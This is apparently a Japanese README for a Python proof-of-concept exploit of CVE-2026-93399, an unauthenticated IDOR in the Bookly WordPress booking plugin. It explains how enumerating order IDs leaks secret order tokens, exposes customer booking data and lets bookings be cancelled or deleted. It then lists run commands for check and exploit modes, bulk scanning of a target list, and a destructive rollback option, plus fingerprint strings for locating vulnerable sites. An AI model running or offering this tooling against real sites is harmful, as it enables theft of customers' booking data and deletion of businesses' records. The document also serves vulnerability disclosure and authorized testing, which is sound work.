
CVE-2026-93399 の Python PoC。Bookly <= 28.2 における未認証の IDOR で、注文トークンを漏洩させ、予約を露出させ、予約をロールバックします。
Bookly(bookly-responsive-appointment-booking-tool)における**CVE-2026-93399**のPython 3 PoCです。
CVE-2026-93399 — Bookly ≤ 28.2は、公開予約AJAXにおいて安全でない直接オブジェクト参照(CWE-639)の脆弱性があります。bookly_get_form_idは攻撃者が制御するorder_idをフォームセッションに保存し、bookly_render_completeはセッションがその注文を作成したかを検証せずに、その注文の秘密のbookly_orderトークンを返します。未認証の攻撃者は注文IDを列挙し、トークンを窃取し、bookly_add_to_calendarを介して予約データを取得し、bookly_rollback_orderで未完了の予約をキャンセル/削除することができます。CVSS 3.1: 9.1 Critical(C:N/I:H/A:H)。> 28.2で修正済み。
PoCページ: https://pocbit.org/pocs/cve-2026-93399
カタログインデックス: https://pocbit.org/pocs/
pip install -r requirements.txt
python poc.py -u https://site.example --mode check
python poc.py -u https://site.example --mode check --order-id 15
python poc.py -u https://site.example --mode check --order-start 1 --order-end 30
python poc.py -u https://site.example --mode exploit --order-id 15 --calendar
python poc.py -u https://site.example --mode exploit --order-id 15 --rollback --confirm-delete
python poc.py --list targets.example.txt --mode check -j 10 --order-start 1 --order-end 5
body="/wp-content/plugins/bookly-responsive-appointment-booking-tool/"
body="bookly_get_form_id"
許可されたテストのみ。**--rollback --confirm-delete**は予約を完全に削除します。